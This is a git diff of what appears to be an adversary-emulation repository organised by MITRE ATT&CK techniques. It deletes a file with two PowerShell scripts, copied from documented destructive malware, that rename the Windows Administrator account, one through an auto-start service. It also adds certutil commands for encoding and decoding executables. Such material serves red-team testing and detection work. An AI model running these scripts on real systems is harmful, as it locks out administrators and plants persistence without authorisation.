diff --git a/Windows/Credential_Access/Account Manipulation b/Windows/Credential_Access/Account Manipulation deleted file mode 100644 index 503e355d..00000000 --- a/Windows/Credential_Access/Account Manipulation +++ /dev/null @@ -1,62 +0,0 @@ -# Account Manipulation - -MITRE ATT&CK Technique: [T1098](https://attack.mitre.org/wiki/Technique/T1098) - -Adapted from [Operation Blockbuster](https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf) - -## Example 1 - -If successful, the Administrator account will be renamed with `HaHaHa_` followed by 4 to 16 digits. - - $x = Get-Random -Minimum 2 -Maximum 9999 - $y = Get-Random -Minimum 2 -Maximum 9999 - $z = Get-Random -Minimum 2 -Maximum 9999 - $w = Get-Random -Minimum 2 -Maximum 9999 - Write-Host HaHaHa_$x$y$z$w - - $hostname = (Get-CIMInstance CIM_ComputerSystem).Name - - $fmm = Get-CimInstance -ClassName win32_group -Filter "name = 'Administrators'" | Get-CimAssociatedInstance -Association win32_groupuser | Select Name - - foreach($member in $fmm) { - if($member -like "*Administrator*") { - Rename-LocalUser -Name $member.Name -NewName "HaHaHa_$x$y$z$w" - Write-Host "Successfully Renamed Administrator Account on" $hostname - } - } - -## Example 2 - -If successful, the Administrator account will be renamed with `HaHaHa_` followed by 4 to 8 digits. - - $x = Get-Random -Minimum 2 -Maximum 99 - $y = Get-Random -Minimum 2 -Maximum 99 - $z = Get-Random -Minimum 2 -Maximum 99 - $w = Get-Random -Minimum 2 -Maximum 99 - $newadmin = "HaHaHa_$x$y$z$w".ToString() - - $serviceName = "Rename Account Service" - $serviceDisplayName = "Rename Account Service" - $serviceDescription = "Rename Account Service" - $serviceExecutable = "wmic useraccount where name='Administrator' rename '$newadmin'" - - if (Get-Service $serviceName -ErrorAction SilentlyContinue) - { - $serviceToRemove = Get-WmiObject -Class Win32_Service -Filter "name='$serviceName'" - $serviceToRemove | Stop-Service - $serviceToRemove.delete() - } - else - { - "service does not exists" - } - - Write-Host "Installing service: $serviceName" - New-Service -name $serviceName -displayName $serviceDisplayName -binaryPathName $serviceExecutable -startupType Automatic -Description $serviceDescription - Write-Host "Installation completed: $serviceName" - - Write-Host "Trying to start new service: $serviceName" - - $serviceToStart = Get-WmiObject -Class Win32_Service -Filter "name='$serviceName'" - $serviceToStart.startservice() - Write-Host "Service started: $serviceName" diff --git a/Windows/Credential_Access/Create Account.md b/Windows/Credential_Access/Create_Account.md similarity index 100% rename from Windows/Credential_Access/Create Account.md rename to Windows/Credential_Access/Create_Account.md diff --git a/Windows/Defense Evasion/Deobfuscate_Decode_Files_Or_Information.md b/Windows/Defense Evasion/Deobfuscate_Decode_Files_Or_Information.md index cc08ef0e..7b9f2d75 100644 --- a/Windows/Defense Evasion/Deobfuscate_Decode_Files_Or_Information.md +++ b/Windows/Defense Evasion/Deobfuscate_Decode_Files_Or_Information.md @@ -3,7 +3,9 @@ MITRE ATT&CK Technique: [T1140](https://attack.mitre.org/wiki/Technique/T1140) ## Example encode executable + certutil.exe -encode file.exe file.txt ## Example decode executable + certutil.exe -decode file.txt file.exe diff --git a/Windows/Discovery/Query_Registry.md b/Windows/Discovery/Query_Registry.md index 4c0747c3..34f3e666 100644 --- a/Windows/Discovery/Query_Registry.md +++ b/Windows/Discovery/Query_Registry.md @@ -27,9 +27,11 @@ Use the following command (as Administrator) to view the drivers configured to l Reg Query HKLM\Software\Microsoft\Windows\CurrentVersion\Run -Reference: https://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order +References: -Reference: https://blog.cylance.com/windows-registry-persistence-part-1-introduction-attack-phases-and-windows-services +https://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order + +https://blog.cylance.com/windows-registry-persistence-part-1-introduction-attack-phases-and-windows-services @@ -41,6 +43,8 @@ Reference: https://blog.cylance.com/windows-registry-persistence-part-1-introduc reg import [FileName ] reg query [\\TargetIPaddr\] [RegDomain]\[ Key ] /v [Valuename!] (you can to add /s for recurse all values ) -Reference: http://www.handgrep.se/repository/cheatsheets/postexploitation/WindowsPost-Exploitation.pdf +References: -Reference: https://www.offensive-security.com/wp-content/uploads/2015/04/wp.Registry_Quick_Find_Chart.en_us.pdf +http://www.handgrep.se/repository/cheatsheets/postexploitation/WindowsPost-Exploitation.pdf + +https://www.offensive-security.com/wp-content/uploads/2015/04/wp.Registry_Quick_Find_Chart.en_us.pdf diff --git a/Windows/README.md b/Windows/README.md index 422fa4f4..3cf59f94 100644 --- a/Windows/README.md +++ b/Windows/README.md @@ -4,7 +4,7 @@ |-------------------------------------------------------|---------------------------------------|-----------------------------------------|----------------------------------------|----------------------------------------|-------------------------------------|------------------------------------|--------------------------------|-----------------------------------------------|-----------------------------------------| | [Accessibility Features](Persistence/Accessibility_Features.md) | Access Token Manipulation | Access Token Manipulation | [Account Manipulation](Credential_Access/Account_Manipulation.md) | [Account Discovery](Discovery/Account_Discovery.md) | Application Deployment Software | [Application Shimming](Persistence/Application_Shimming.md) | [Audio Capture](Collection/Audio_Capture.md) | Automated Exfiltration | Commonly Used Port | | [AppInit DLLs](Persistence/AppInit_DLLs.md) | [Accessibility Features](Persistence/Accessibility_Features.md) | Binary Padding | [Brute Force](Credential_Access/Brute_Force.md) | Application Window Discovery | Exploitation of Vulnerability | Command-Line Interface | [Automated Collection](Collection/Automated_Collection.md) | [Data Compressed](Exfiltration/Data_Compressed.md) | Communication Through Removable Media | -| [Application Shimming](Persistence/Application_Shimming.md) | [AppInit DLLs](Persistence/AppInit_DLLs.md) | Bypass User Account Control | [Create Account](Credential_Access/Create%20Account.md) | File and Directory Discovery | Logon Scripts | Execution through API | [Clipboard Data](Collection/Clipboard_Data.md) | Data Encrypted | Connection Proxy | +| [Application Shimming](Persistence/Application_Shimming.md) | [AppInit DLLs](Persistence/AppInit_DLLs.md) | Bypass User Account Control | [Create Account](Credential_Access/Create_Account.md) | File and Directory Discovery | Logon Scripts | Execution through API | [Clipboard Data](Collection/Clipboard_Data.md) | Data Encrypted | Connection Proxy | | Authentication Package | [Application Shimming](Persistence/Application_Shimming.md) | Code Signing | [Credential Dumping](Credential_Access/Credential%20Dumping.md) | Network Service Scanning | Pass the Hash | Execution through Module Load | Data Staged | Data Transfer Size Limits | Custom Command and Control Protocol | | Bootkit | Bypass User Account Control | Component Firmware | [Credentials in Files](Credential_Access/Credentials_in_Files.md) | Network Share Discovery | Pass the Ticket | Graphical User Interface | Data from Local System | Exfiltration Over Alternative Protocol | Custom Cryptographic Protocol | | [Change Default File Association](Persistence/Change_Default_File_Association.md) | [DLL Injection](Privilege%20Escalation/DLL%20Injection.md) | [Component Object Model Hijacking](Persistence/Component_Object_Model_Hijacking.md) | Exploitation of Vulnerability | Peripheral Device Discovery | Remote Desktop Protocol | [InstallUtil](Execution/InstallUtil.md) | Data from Network Shared Drive | Exfiltration Over Command and Control Channel | Data Encoding |